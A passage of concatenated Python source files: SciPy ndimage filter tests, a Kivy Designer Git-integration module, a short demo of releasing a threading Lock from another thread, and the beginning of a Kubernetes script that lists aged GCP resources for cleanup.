    nonzero elements, not the values themselves.
    """
    arr = np.zeros((100, 100), float)
    arr[50, 50] = 1
    num_nonzeros_2 = (sndi.gaussian_filter(arr, 5, truncate=2) > 0).sum()
    assert_equal(num_nonzeros_2, 21**2)
    num_nonzeros_5 = (sndi.gaussian_filter(arr, 5, truncate=5) > 0).sum()
    assert_equal(num_nonzeros_5, 51**2)
    # Test truncate when sigma is a sequence.
    f = sndi.gaussian_filter(arr, [0.5, 2.5], truncate=3.5)
    fpos = f > 0
    n0 = fpos.any(axis=0).sum()
    # n0 should be 2*int(2.5*3.5 + 0.5) + 1
    assert_equal(n0, 19)
    n1 = fpos.any(axis=1).sum()
    # n1 should be 2*int(0.5*3.5 + 0.5) + 1
    assert_equal(n1, 5)
    # Test gaussian_filter1d.
    x = np.zeros(51)
    x[25] = 1
    f = sndi.gaussian_filter1d(x, sigma=2, truncate=3.5)
    n = (f > 0).sum()
    assert_equal(n, 15)
    # Test gaussian_laplace and gaussian_gradient_magnitude: check the span
    # of the nonzero region.
    # FIX: the ndarray.ptp() method was removed in NumPy 2.0; compute the
    # peak-to-peak span explicitly instead.
    for func in (sndi.gaussian_laplace, sndi.gaussian_gradient_magnitude):
        y = func(x, sigma=2, truncate=3.5)
        nonzero_indices = np.nonzero(y != 0)[0]
        n = nonzero_indices.max() - nonzero_indices.min() + 1
        assert_equal(n, 15)
class TestThreading(object):
    """Serial and threaded filter runs must produce identical output."""

    def check_func_serial(self, n, fun, args, out):
        # Run fun n times sequentially, writing into out[i].
        for i in range(n):
            fun(*args, output=out[i])

    def check_func_thread(self, n, fun, args, out):
        from threading import Thread
        workers = []
        for i in range(n):
            workers.append(Thread(target=fun, args=args,
                                  kwargs={'output': out[i]}))
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()

    def test_correlate1d(self):
        data = np.random.randn(5000)
        serial = np.empty((4, data.size))
        threaded = np.empty_like(serial)
        self.check_func_serial(4, sndi.correlate1d, (data, np.arange(5)), serial)
        self.check_func_thread(4, sndi.correlate1d, (data, np.arange(5)), threaded)
        assert_array_equal(serial, threaded)

    def test_correlate(self):
        data = np.random.randn(500, 500)
        kernel = np.random.randn(10, 10)
        serial = np.empty([4] + list(data.shape))
        threaded = np.empty_like(serial)
        self.check_func_serial(4, sndi.correlate, (data, kernel), serial)
        self.check_func_thread(4, sndi.correlate, (data, kernel), threaded)
        assert_array_equal(serial, threaded)

    def test_median_filter(self):
        data = np.random.randn(500, 500)
        serial = np.empty([4] + list(data.shape))
        threaded = np.empty_like(serial)
        self.check_func_serial(4, sndi.median_filter, (data, 3), serial)
        self.check_func_thread(4, sndi.median_filter, (data, 3), threaded)
        assert_array_equal(serial, threaded)

    def test_uniform_filter1d(self):
        data = np.random.randn(5000)
        serial = np.empty((4, data.size))
        threaded = np.empty_like(serial)
        self.check_func_serial(4, sndi.uniform_filter1d, (data, 5), serial)
        self.check_func_thread(4, sndi.uniform_filter1d, (data, 5), threaded)
        assert_array_equal(serial, threaded)

    def test_minmax_filter(self):
        data = np.random.randn(500, 500)
        serial = np.empty([4] + list(data.shape))
        threaded = np.empty_like(serial)
        for filt in (sndi.maximum_filter, sndi.minimum_filter):
            self.check_func_serial(4, filt, (data, 3), serial)
            self.check_func_thread(4, filt, (data, 3), threaded)
            assert_array_equal(serial, threaded)
def test_minmaximum_filter1d():
    # Regression gh-3898: a size-1 min/max filter is the identity.
    data = np.arange(10)
    assert_equal(data, sndi.minimum_filter1d(data, 1))
    assert_equal(data, sndi.maximum_filter1d(data, 1))
    # Size-5 window, one expected output per boundary mode.
    min_expected = {
        'reflect': [0, 0, 0, 1, 2, 3, 4, 5, 6, 7],
        'nearest': [0, 0, 0, 1, 2, 3, 4, 5, 6, 7],
        'wrap': [0, 0, 0, 1, 2, 3, 4, 5, 0, 0],
    }
    max_expected = {
        'reflect': [2, 3, 4, 5, 6, 7, 8, 9, 9, 9],
        'nearest': [2, 3, 4, 5, 6, 7, 8, 9, 9, 9],
        'wrap': [9, 9, 4, 5, 6, 7, 8, 9, 9, 9],
    }
    for mode, expected in min_expected.items():
        assert_equal(expected, sndi.minimum_filter1d(data, 5, mode=mode))
    for mode, expected in max_expected.items():
        assert_equal(expected, sndi.maximum_filter1d(data, 5, mode=mode))
    # Constant mode fills the border with cval.
    assert_equal([-1, -1, 0, 1, 2, 3, 4, 5, -1, -1],
                 sndi.minimum_filter1d(data, 5, mode='constant', cval=-1))
    assert_equal([10, 10, 4, 5, 6, 7, 8, 9, 10, 10],
                 sndi.maximum_filter1d(data, 5, mode='constant', cval=10))
def test_uniform_filter1d_roundoff_errors():
    # gh-6930: the integer uniform filter must not accumulate roundoff.
    data = np.repeat([0, 1, 0], [9, 9, 9])
    for width in range(3, 10):
        filtered = sndi.uniform_filter1d(data, width)
        assert_equal(filtered.sum(), 10 - width)
def test_footprint_all_zeros():
    # Regression test for gh-6876: a footprint of all zeros used to
    # segfault instead of raising.
    image = np.random.randint(0, 100, (100, 100))
    empty_footprint = np.zeros((3, 3), bool)
    with assert_raises(ValueError):
        sndi.maximum_filter(image, footprint=empty_footprint)
def test_gaussian_filter():
    # gh-8207: gaussian_filter does not support np.float16 input and must
    # raise RuntimeError.
    half_precision = np.array([1], dtype=np.float16)
    with assert_raises(RuntimeError):
        sndi.gaussian_filter(half_precision, 1.0)
def test_rank_filter_noninteger_rank():
    # Regression test for issue 9388: a non-integer rank must raise
    # TypeError when performing rank_filter.
    volume = np.random.random((10, 20, 30))
    footprint = np.ones((1, 1, 10), dtype=bool)
    assert_raises(TypeError, rank_filter, volume, 0.5, footprint=footprint)
def test_size_footprint_both_set():
    # Input validation: when both size and footprint are given, footprint
    # wins and a UserWarning is emitted.
    with suppress_warnings() as sup:
        sup.filter(UserWarning,
                   "ignoring size because footprint is set")
        volume = np.random.random((10, 20, 30))
        rank_filter(volume, 5, size=2,
                    footprint=np.ones((1, 1, 10), dtype=bool))
|
git_integration.py | __all__ = ['RemoteProgress', 'GitRemoteProgress', 'DesignerGit']
from uix.action_items import DesignerActionSubMenu, DesignerSubActionButton
from components.designer_content import DesignerCloseableTab
from uix.settings import SettingListContent
from uix.py_code_input import PyScrollView
from uix.input_dialog import InputDialog
from utils.utils import (
FakeSettingList, get_current_project,
get_designer, get_kd_dir, show_message,
ignore_proj_watcher, show_alert,
)
import os
os.environ["GIT_PYTHON_REFRESH"] = "quiet"
from git import GitCommandError, RemoteProgress, Repo
from git.exc import InvalidGitRepositoryError
from kivy.properties import ObjectProperty, StringProperty
from kivy.core.window import Window
from kivy.uix.label import Label
from kivy.uix.actionbar import ActionButton
from kivy.uix.popup import Popup
from kivy.clock import Clock
from kivy.metrics import dp
from pygments.lexers.diff import DiffLexer
import threading, subprocess
from io import open
class RemoteProgress(Label):
    # Kivy Label used as the base of the Git progress widget below.
    # NOTE(review): this deliberately shadows git.RemoteProgress imported
    # above — GitRemoteProgress re-implements update() with the GitPython
    # callback signature; confirm the git protocol base is not required.
    pass
class GitRemoteProgress(RemoteProgress):
    '''Shows Git remote operation progress in a Kivy label.

    GitPython invokes :meth:`update` from its worker; the label text is
    refreshed on the UI side by a Clock interval started with :meth:`start`
    and cancelled with :meth:`stop`.
    '''
    label = None   # Kivy Label that displays the progress text
    text = ''      # latest progress message, consumed by update_text()

    def __init__(self):
        super(GitRemoteProgress, self).__init__()
        self.label = Label(text='')
        self.label.padding = [10, 10]

    def update(self, op_code, cur_count, max_count=None, message=''):
        '''GitPython progress callback; stores the formatted progress text.
        '''
        max_vl = (max_count or 100.0)
        msg = message.replace(',', '').strip()
        # FIX: the original applied the format spec "2f" to a str
        # (f"{str(cur_count/max_vl):2f}"), which raises ValueError at
        # runtime. Format the ratio directly as a float instead.
        self.text = f"Progress: {cur_count / max_vl:.2f} ({cur_count} of {max_vl})\n{msg}"

    def update_text(self, *args):
        '''Update the label text
        '''
        if self.text:
            self.label.text = self.text

    def start(self):
        '''Start the label updating in a separated thread
        '''
        Clock.schedule_interval(self.update_text, 0.2)

    def stop(self):
        '''Stop the label updating
        '''
        Clock.unschedule(self.update_text)
class DesignerGit(DesignerActionSubMenu):
is_repo = ObjectProperty(False)
'''Indicates if it's representing a valid git repository
:data:`is_repo` is a :class:`~kivy.properties.BooleanProperty`, defaults
to False.
'''
path = StringProperty('')
'''Project path
:data:`path` is a :class:`~kivy.properties.StringProperty`,
defaults to ''.
'''
repo = ObjectProperty(None)
'''Instance of Git repository.
:data:`repo` is a :class:`~kivy.properties.ObjectProperty`, defaults
to None.
'''
diff_code_input = ObjectProperty(None)
'''Instance of PyCodeInput with Git diff
:data:`diff_code_input` is a :class:`~kivy.properties.ObjectProperty`,
defaults to None.
'''
__events__ = ('on_branch', )
def __init__(self, **kwargs):
super(DesignerGit, self).__init__(**kwargs)
self._update_menu()
def load_repo(self, path):
'''Load a git/non-git repo from path
:param path: project path
'''
self.path = path
try:
self.repo = Repo(path)
self.is_repo = True
branch_name = self.repo.active_branch.name
self.dispatch('on_branch', branch_name)
if os.name in ('posix', 'nt'):
script = os.path.join(get_kd_dir(), 'tools', 'ssh-agent', 'ssh.sh')
self.repo.git.update_environment(GIT_SSH_COMMAND=script)
except InvalidGitRepositoryError:
self.is_repo = False
self.is_repo = False
self._update_menu()
def _update_menu(self, *args):
'''Update the Git ActionSubMenu content.
If a valid repo is open, git tools will be available.
Is not a git repo, git init is available.
'''
self.remove_children()
d = get_designer()
loader = get_current_project().path if d else None
if not loader:
self.disabled = True
return None
self.disabled = False
if self.is_repo:
btn_commit = DesignerSubActionButton(text='Commit')
btn_commit.bind(on_press=self.do_commit)
btn_add = DesignerSubActionButton(text='Add...')
btn_add.bind(on_press=self.do_add)
btn_branches = DesignerSubActionButton(text='Branches...')
btn_branches.bind(on_press=self.do_branches)
btn_diff = DesignerSubActionButton(text='Diff')
btn_diff.bind(on_press=self.do_diff)
btn_push = DesignerSubActionButton(text='Push')
btn_push.bind(on_press=self.do_push)
btn_pull = DesignerSubActionButton(text='Pull')
btn_pull.bind(on_press=self.do_pull)
self.add_widget(btn_commit)
self.add_widget(btn_add)
self.add_widget(btn_branches)
self.add_widget(btn_diff)
self.add_widget(btn_push)
self.add_widget(btn_pull)
else:
btn_init = DesignerSubActionButton(text='Init repo')
btn_init.bind(on_press=self.do_init)
self.add_widget(btn_init)
self._add_widget()
def validate_remote(self):
'''Validates Git remote auth. If system if posix, returns True.
If on NT, reads tools/ssh-agent/ssh_status.txt, if equals 1,
returns True else runs the tools/ssh-agent/ssh.bat and returns False
'''
if os.name == 'nt':
script = os.path.join(get_kd_dir(), 'tools', 'ssh-agent', 'ssh.bat')
status_txt = os.path.join(get_kd_dir(), 'tools', 'ssh-agent', 'ssh_status.txt')
with open(status_txt, 'r', encoding='utf-8') as file:
status = file.read()
file.close()
status = status.strip()
if status == '1':
return True
else:
subprocess.call(script, shell=True)
return False
return True
@ignore_proj_watcher
def do_init(self, *args):
'''Git init
'''
try:
self.repo = Repo.init(self.path, mkdir=False)
self.repo.index.commit('Init commit')
self.is_repo = True
self._update_menu()
show_message('Git repo initialized', 5, 'info')
except Exception:
show_alert('Git Init', 'Failted to initialize repo!')
def do_commit(self, *args):
'''Git commit
'''
d = get_designer()
toll_bar_top = d.ids.toll_bar_top
if toll_bar_top.popup:
return False
input_dlg = InputDialog('Commit message: ')
toll_bar_top.popup = Popup(
title='Git Commit', content=input_dlg, auto_dismiss=False,
size_hint=(None, None), size=('300pt', '150pt'),
)
input_dlg.bind(
on_confirm=self._perform_do_commit,
on_cancel=toll_bar_top.close_popup,
)
toll_bar_top.popup.open()
return True
@ignore_proj_watcher
def _perform_do_commit(self, input, *args):
    '''Commit all tracked changes ('git commit -am') using the message
    typed in the InputDialog. Shows an alert if there is nothing to
    commit or the commit fails; always closes the popup afterwards.
    '''
    message = input.user_input.text
    if self.repo.is_dirty():
        try:
            self.repo.git.commit('-am', message)
            show_message(f'Commit: {message}', 5, 'info')
        except GitCommandError as e:
            show_alert('Git Commit', f'Failed to commit!\n{e}')
    else:
        show_alert('Git Commit', 'There is nothing to commit')
    # always dismiss the commit-message popup
    get_designer().ids.toll_bar_top.close_popup()
@ignore_proj_watcher
def do_add(self, *args):
    '''Show a list of untracked files so the user can pick which ones to
    add to the Git index; _perform_do_add performs the actual add.

    Returns False if another popup is already open, None otherwise.
    '''
    d = get_designer()
    toll_bar_top = d.ids.toll_bar_top
    if toll_bar_top.popup:
        return False
    files = self.repo.untracked_files
    if not files:
        show_alert('Git Add', 'All files are already indexed by Git')
        return None
    # create the popup listing untracked files
    fake_setting = FakeSettingList()
    fake_setting.allow_custom = False
    fake_setting.items = files
    fake_setting.desc = 'Select files to add to Git index'
    content = SettingListContent(setting=fake_setting)
    popup_width = min(0.95 * Window.width, dp(500))
    popup_height = min(0.95 * Window.height, dp(500))
    popup = Popup(
        content=content, title='Git - Add files', size_hint=(None, None),
        size=(popup_width, popup_height), auto_dismiss=False)
    content.bind(
        on_apply=self._perform_do_add,
        on_cancel=toll_bar_top.close_popup)
    content.show_items()
    toll_bar_top.popup = popup
    popup.open()
@ignore_proj_watcher
def _perform_do_add(self, instance, selected_files, *args):
    '''Add the files selected in the list popup to the Git index and
    close the popup; shows an alert if the add fails.
    '''
    try:
        self.repo.index.add(selected_files)
        show_message(f'{len(selected_files)} file(s) added to Git index', 5, 'info')
        get_designer().ids.toll_bar_top.close_popup()
    except GitCommandError as e:
        show_alert('Git Add', f'Failed to add files to Git!\n{e}')
def do_branches(self, *args):
    '''Show the list of local branches and allow switching; typing a new
    name creates that branch. _perform_do_branches applies the choice.

    Returns False if another popup is already open, None otherwise.
    '''
    d = get_designer()
    toll_bar_top = d.ids.toll_bar_top
    if toll_bar_top.popup:
        return False
    branches = []
    for b in self.repo.heads:
        branches.append(b.name)
    # create the popup; allow_custom lets the user type a new branch name
    fake_setting = FakeSettingList()
    fake_setting.allow_custom = True
    fake_setting.items = branches
    fake_setting.desc = 'Checkout to the selected branch. \nYou can type a name to create a new branch'
    fake_setting.group = 'git_branch'
    content = SettingListContent(setting=fake_setting)
    popup_width = min(0.95 * Window.width, dp(500))
    popup_height = min(0.95 * Window.height, dp(500))
    popup = Popup(
        content=content, title='Git - Branches', size_hint=(None, None),
        size=(popup_width, popup_height), auto_dismiss=False)
    content.bind(
        on_apply=self._perform_do_branches,
        on_cancel=toll_bar_top.close_popup)
    # pre-select the currently active branch
    content.selected_items = [self.repo.active_branch.name]
    content.show_items()
    toll_bar_top.popup = popup
    popup.open()
@ignore_proj_watcher
def _perform_do_branches(self, instance, branches, *args):
    '''Checkout the selected branch, creating it first when the name is
    new. Aborts with an alert when the working tree has uncommitted
    changes. Dispatches 'on_branch' with the new active branch name.
    '''
    get_designer().ids.toll_bar_top.close_popup()
    if self.repo.is_dirty():
        show_alert('Git checkout', 'Please, commit your changes before switch branches.')
        return None
    if not branches:
        # user applied the dialog with nothing selected
        return None
    branch = branches[0]
    try:
        if branch in self.repo.heads:
            self.repo.heads[branch].checkout()
        else:
            # a new name typed by the user: create the branch, then switch
            self.repo.create_head(branch)
            self.repo.heads[branch].checkout()
        branch_name = self.repo.active_branch.name
        self.dispatch('on_branch', branch_name)
    except GitCommandError as e:
        show_alert('Git Branches', f'Failed to switch branch!\n{e}')
def on_branch(self, *args):
    '''Default handler of the ``on_branch`` event. The active branch
    name is delivered to bound listeners; nothing is done here.
    '''
def do_diff(self, *args):
    '''Show the output of 'git diff' in a read-only CodeInput tab.

    If the diff tab is already on the tabbed panel, its text is updated
    in place; otherwise the tab widget is created once (and reused) and
    added to the panel.
    '''
    diff = self.repo.git.diff()
    if not diff:
        diff = 'Empty diff'
    d = get_designer()
    panel = d.designer_content.tab_pannel
    # check if diff is visible on tabbed panel.
    # if so, update the text content
    for i, code_input in enumerate(panel.tab_list):
        if code_input == self.diff_code_input:
            # NOTE(review): the index math assumes Kivy's tab_list layout
            # (tab_list is reversed relative to insertion order) — confirm
            panel.switch_to(panel.tab_list[len(panel.tab_list) - i - 2])
            code_input.content.code_input.text = diff
            return None
    # if not displayed, create or add it to the screen
    if self.diff_code_input is None:
        panel_item = DesignerCloseableTab(title='Git diff')
        panel_item.bind(on_close=panel.on_close_tab)
        scroll = PyScrollView()
        _py_code_input = scroll.code_input
        _py_code_input.text = diff
        _py_code_input.path = ''
        _py_code_input.readonly = True      # diff view is display-only
        _py_code_input.lexer = DiffLexer()  # diff syntax highlighting
        _py_code_input.saved = True
        panel_item.content = scroll
        panel_item.rel_path = ''
        self.diff_code_input = panel_item
    else:
        self.diff_code_input.content.code_input.text = diff
    panel.add_widget(self.diff_code_input)
    panel.switch_to(panel.tab_list[0])
def do_push(self, *args):
    '''Show the list of configured git remotes to push to; the push
    itself is performed by _perform_do_push.

    Shows an alert when remote authentication is not ready or when no
    remote is configured. Returns False if another popup is already
    open, None otherwise.
    '''
    d = get_designer()
    toll_bar_top = d.ids.toll_bar_top
    if toll_bar_top.popup:
        return False
    if not self.validate_remote():
        # BUG FIX: title and message were previously fused into a single
        # argument, leaving show_alert without its message parameter
        # (compare the correct call in do_pull).
        msg = 'To use Git remote you need to enter your ssh password'
        show_alert('Git - Remote Authentication', msg)
        return None
    remotes = []
    for r in self.repo.remotes:
        remotes.append(r.name)
    if not remotes:
        show_alert('Git Push Remote', 'There is no git remote configured!')
        return None
    # create the popup listing the remotes
    fake_setting = FakeSettingList()
    fake_setting.allow_custom = False
    fake_setting.items = remotes
    fake_setting.desc = 'Push data to the selected remote'
    fake_setting.group = 'git_remote'
    content = SettingListContent(setting=fake_setting)
    popup_width = min(0.95 * Window.width, dp(500))
    popup_height = min(0.95 * Window.height, dp(500))
    popup = Popup(
        content=content, title='Git - Push Remote', size_hint=(None, None),
        size=(popup_width, popup_height), auto_dismiss=False)
    content.bind(
        on_apply=self._perform_do_push,
        on_cancel=toll_bar_top.close_popup)
    content.selected_items = [remotes[0]]
    content.show_items()
    toll_bar_top.popup = popup
    popup.open()
def _perform_do_push(self, instance, remotes, *args):
    '''Push the active branch to the selected remote, reporting progress
    in a popup. The push itself runs in a background thread so the UI
    stays responsive.
    '''
    remote = remotes[0]
    remote_repo = self.repo.remotes[remote]
    progress = GitRemoteProgress()
    status = Popup(
        title='Git push progress', content=progress.label,
        size_hint=(None, None), size=(dp(500), dp(200)))
    status.open()
    @ignore_proj_watcher
    def push(*args):
        '''Do a push in a separated thread.
        '''
        try:
            remote_repo.push(self.repo.active_branch.name, progress=progress)
            def set_progress_done(*args):
                progress.label.text = 'Completed!'
            # schedule the label update on the main (Kivy) thread
            Clock.schedule_once(set_progress_done, 1)
            progress.stop()
            show_message('Git remote push completed!', 5, 'info')
        except GitCommandError as e:
            progress.label.text = f'Failed to push!\n{e}'
            show_message('Failed to push', 5, 'error')
        get_designer().ids.toll_bar_top.close_popup()
    progress.start()
    threading.Thread(target=push).start()
def do_pull(self, *args):
    '''Show the list of configured git remotes to pull from; the pull
    itself is performed by _perform_do_pull.

    Shows an alert when remote authentication is not ready or when no
    remote is configured. Returns False if another popup is already
    open, None otherwise.
    '''
    d = get_designer()
    toll_bar_top = d.ids.toll_bar_top
    if toll_bar_top.popup:
        return False
    if not self.validate_remote():
        msg = 'To use Git remote you need to enter your ssh password'
        show_alert('Git - Remote Authentication', msg)
        return None
    remotes = []
    for r in self.repo.remotes:
        remotes.append(r.name)
    if not remotes:
        show_alert('Git Pull Remote', 'There is no git remote configured!')
        return None
    # create the popup listing the remotes
    fake_setting = FakeSettingList()
    fake_setting.allow_custom = False
    fake_setting.items = remotes
    fake_setting.desc = 'Pull data from the selected remote'
    fake_setting.group = 'git_remote'
    content = SettingListContent(setting=fake_setting)
    popup_width = min(0.95 * Window.width, dp(500))
    popup_height = min(0.95 * Window.height, dp(500))
    # FIX: removed the accidental duplicated assignment 'popup = popup = Popup(...)'
    popup = Popup(
        content=content, title='Git - Pull Remote',
        size_hint=(None, None), auto_dismiss=False,
        size=(popup_width, popup_height))
    content.bind(
        on_apply=self._perform_do_pull,
        on_cancel=toll_bar_top.close_popup)
    content.selected_items = [remotes[0]]
    content.show_items()
    toll_bar_top.popup = popup
    popup.open()
def _perform_do_pull(self, instance, remotes, *args):
    '''Pull from the selected remote, reporting progress in a popup.
    The pull itself runs in a background thread so the UI stays
    responsive.
    '''
    remote = remotes[0]
    remote_repo = self.repo.remotes[remote]
    progress = GitRemoteProgress()
    status = Popup(
        title='Git pull progress',
        content=progress.label,
        size_hint=(None, None),
        size=(dp(500), dp(200)))
    status.open()
    @ignore_proj_watcher
    def pull(*args):
        '''Do a pull in a separated thread.
        '''
        try:
            remote_repo.pull(progress=progress)
            def set_progress_done(*args):
                progress.label.text = 'Completed!'
            # schedule the label update on the main (Kivy) thread
            Clock.schedule_once(set_progress_done, 1)
            progress.stop()
            # pass the level explicitly, consistent with _perform_do_push
            show_message('Git remote pull completed!', 5, 'info')
        except GitCommandError as e:
            progress.label.text = f'Failed to pull!\n{e}'
            # surface the failure in the status bar too, like do_push does
            show_message('Failed to pull', 5, 'error')
        get_designer().ids.toll_bar_top.close_popup()
    progress.start()
    threading.Thread(target=pull).start()
|
locks_doesnot_lock_any_thing.py |
"""
A primitive lock is in one of two states, "locked" or "unlocked". It is created in the
unlocked state. It has two basic methods, acquire() and release(). When the state is unlocked,
acquire() changes the state to locked and returns immediately. When the state is locked, acquire()
blocks until a call to release() in another thread changes it to unlocked, then the acquire()
call resets it to locked and returns. The release() method should only be called in the locked
state; it changes the state to unlocked and returns immediately. If an attempt is made to release
an unlocked lock, a RuntimeError will be raised.
note 1: if a thread has acquired the lock and calls acquire() again before releasing it,
it will block, because the second acquire() waits for the state to become unlocked.
note 2: acquire() has a default boolean argument that makes it either blocking or
non-blocking, and a timeout for how long to wait for the lock; it returns True if the
lock was acquired and False if not (when called in non-blocking mode).
"""
from threading import Lock ,Thread ,enumerate,main_thread
import time
# shared lock and counter used by both worker threads below
lock = Lock()
num = 1
def sumOne():
    '''Acquire the lock, sleep (so the other thread runs), increment the
    shared counter, then try to release.

    By the time this thread wakes up, sumTwo has already released the
    lock (even though it never owned it), so the release() here raises
    RuntimeError, which is deliberately swallowed — that is the point of
    the demo.
    '''
    global num
    s=lock.acquire()
    print("sum one acquire the lock",s)
    time.sleep(1) # make it sleep so the other thread go and run ,and bypass the lock
    num = num + 1
    try:
        lock.release()
        # only printed if release() succeeded (it normally does not here)
        print("not realsed 1")
    except:
        pass
def sumTwo():
    '''Try a non-blocking acquire (returns False because sumOne holds the
    lock), mutate the shared counter anyway, then release the lock.
    '''
    global num
    s=lock.acquire(0)
    print("sum two bypass acquire the lock",s)
    num = num / 2
    lock.release()
    print('sum two relased the lock')
    # A plain Lock can be released by a thread that never acquired it,
    # unlike RLock, which can only be released by its owner. So when the
    # sumOne thread resumes, its own release() raises RuntimeError.
# start both worker threads
Thread(target=sumOne).start()
Thread(target=sumTwo).start()
# wait for every thread except the main one to finish
main_thread=main_thread()
for thread in enumerate():
    if thread !=main_thread:
        thread.join()
# displaying the value of shared resource
print(num)
|
gcp_janitor.py | #!/usr/bin/env python
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Clean up resources from gcp projects. """
import argparse
import collections
import datetime
import json
import os
import subprocess
import sys
import threading
# A resource that need to be cleared.
# Fields: api_version (e.g. '' or 'beta'), group (gcloud command group),
# name (resource type), subgroup (optional sub-command), condition
# (scoping flag: 'zone'/'region'/None), managed ('Yes'/'No'/None for
# instance groups), tolerate (ignore list/delete failures), bulk_delete
# (whether many items may be deleted in one gcloud call).
Resource = collections.namedtuple(
    'Resource', 'api_version group name subgroup condition managed tolerate bulk_delete')
DEMOLISH_ORDER = [
    # [WARNING FROM KRZYZACY] : TOUCH THIS WITH CARE!
    # ORDER REALLY MATTERS HERE!
    # compute resources
    Resource('', 'compute', 'instances', None, 'zone', None, False, True),
    Resource('', 'compute', 'addresses', None, 'region', None, False, True),
    Resource('', 'compute', 'disks', None, 'zone', None, False, True),
    Resource('', 'compute', 'disks', None, 'region', None, False, True),
    Resource('', 'compute', 'firewall-rules', None, None, None, False, True),
    Resource('', 'compute', 'routes', None, None, None, False, True),
    Resource('', 'compute', 'forwarding-rules', None, None, None, False, True),
    Resource('beta', 'compute', 'forwarding-rules', None, 'region', None, False, True),
    Resource('', 'compute', 'target-http-proxies', None, None, None, False, True),
    Resource('beta', 'compute', 'target-http-proxies', None, 'region', None, False, True),
    Resource('', 'compute', 'target-https-proxies', None, None, None, False, True),
    Resource('beta', 'compute', 'target-https-proxies', None, 'region', None, False, True),
    Resource('', 'compute', 'target-tcp-proxies', None, None, None, False, True),
    Resource('beta', 'compute', 'target-tcp-proxies', None, 'region', None, False, True),
    # NOTE(review): the two target-tcp-proxies entries below duplicate the
    # pair above (and 'routes' appears again near the end) — possibly an
    # intentional second pass, but confirm before relying on it.
    Resource('', 'compute', 'target-tcp-proxies', None, None, None, False, True),
    Resource('beta', 'compute', 'target-tcp-proxies', None, 'region', None, False, True),
    Resource('', 'compute', 'ssl-certificates', None, None, None, False, True),
    Resource('beta', 'compute', 'ssl-certificates', None, 'region', None, False, True),
    Resource('', 'compute', 'url-maps', None, None, None, False, True),
    Resource('beta', 'compute', 'url-maps', None, 'region', None, False, True),
    Resource('', 'compute', 'backend-services', None, 'region', None, False, True),
    Resource('', 'compute', 'target-pools', None, 'region', None, False, True),
    Resource('', 'compute', 'health-checks', None, None, None, False, True),
    Resource('beta', 'compute', 'health-checks', None, 'region', None, False, True),
    Resource('', 'compute', 'http-health-checks', None, None, None, False, True),
    Resource('', 'compute', 'instance-groups', None, 'zone', 'Yes', False, True),
    Resource('', 'compute', 'instance-groups', None, 'zone', 'No', False, True),
    Resource('', 'compute', 'instance-templates', None, None, None, False, True),
    Resource('', 'compute', 'sole-tenancy', 'node-groups', 'zone', None, False, True),
    Resource('', 'compute', 'sole-tenancy', 'node-templates', 'region', None, False, True),
    Resource('beta', 'compute', 'network-endpoint-groups', None, 'zone', None, False, False),
    Resource('', 'compute', 'networks', 'subnets', 'region', None, True, True),
    Resource('', 'compute', 'networks', None, '', None, False, True),
    Resource('', 'compute', 'routes', None, None, None, False, True),
    Resource('', 'compute', 'routers', None, 'region', None, False, True),
    # logging resources
    Resource('', 'logging', 'sinks', None, None, None, False, False),
]
def log(message):
    """ Print *message* with a timestamp prefix, but only when --verbose
    is set (reads the module-level ARGS parsed in __main__). """
    if ARGS.verbose:
        tss = "[" + str(datetime.datetime.now()) + "] "
        print tss + message + '\n'
def base_command(resource):
    """ Build the leading portion of a gcloud command for *resource*.

    Args:
        resource: Definition of a type of gcloud resource.
    Returns:
        List of command tokens:
        ['gcloud', [api_version], group, '-q', name, [subgroup]].
    """
    cmd = ['gcloud']
    if resource.api_version:
        cmd.append(resource.api_version)
    cmd.extend([resource.group, '-q', resource.name])
    if resource.subgroup:
        cmd.append(resource.subgroup)
    return cmd
def validate_item(item, age, resource, clear_all):
    """ Decide whether a gcloud item is eligible for cleanup.

    Args:
        item: a gcloud resource item from json format.
        age: Time cutoff from the creation of a resource.
        resource: Definition of a type of gcloud resource.
        clear_all: If need to clean regardless of timestamp.
    Returns:
        True if the object needs to be cleaned, False otherwise.
    Raises:
        ValueError if json result from gcloud is invalid.
    """
    if resource.managed:
        if 'isManaged' not in item:
            raise ValueError(resource.name, resource.managed)
        if item['isManaged'] != resource.managed:
            return False
    if clear_all:
        # clear everything, regardless of creation timestamp
        return True
    if 'creationTimestamp' not in item:
        raise ValueError('missing key: creationTimestamp - %r' % item)
    stamp = item['creationTimestamp']
    # timestamps are requested in UTC via the gcloud --format clause
    created = datetime.datetime.strptime(stamp, '%Y-%m-%dT%H:%M:%S')
    log('Found %r(%r), %r, created time = %r' %
        (resource.name, resource.subgroup, item['name'], stamp))
    if created >= age:
        return False
    log('Added to janitor list: %r(%r), %r' %
        (resource.name, resource.subgroup, item['name']))
    return True
def collect(project, age, resource, filt, clear_all):
    """ Collect a list of resources for each condition (zone or region).
    Args:
        project: The name of a gcp project.
        age: Time cutoff from the creation of a resource.
        resource: Definition of a type of gcloud resource.
        filt: Filter clause for gcloud list command.
        clear_all: If need to clean regardless of timestamp.
    Returns:
        A dict of condition : list of gcloud resource object.
    Raises:
        ValueError if json result from gcloud is invalid.
        subprocess.CalledProcessError if cannot list the gcloud resource
    """
    col = collections.defaultdict(list)
    # TODO(krzyzacy): logging sink does not have timestamp
    # don't even bother listing it if not clear_all
    if resource.name == 'sinks' and not clear_all:
        return col
    cmd = base_command(resource)
    cmd.extend([
        'list',
        '--format=json(name,creationTimestamp.date(tz=UTC),zone,region,isManaged)',
        '--filter="%s"' % filt,
        '--project=%s' % project])
    log('%r' % cmd)
    # TODO(krzyzacy): work around for alpha API list calls
    try:
        items = subprocess.check_output(cmd)
    except subprocess.CalledProcessError:
        # tolerated resources may not be listable at all (e.g. alpha APIs)
        if resource.tolerate:
            return col
        raise
    for item in json.loads(items):
        log('parsing item: %r' % item)
        if 'name' not in item:
            raise ValueError('missing key: name - %r' % item)
        if resource.condition and resource.condition in item:
            # group items by their zone/region value
            colname = item[resource.condition]
            log('looking for items in %s=%s' % (resource.condition, colname))
        else:
            colname = ''
        if validate_item(item, age, resource, clear_all):
            col[colname].append(item['name'])
    return col
def asyncCall(cmd, tolerate, name, errs, lock, hide_output):
    """ Run *cmd*, recording the failure in *errs* (under *lock*) unless
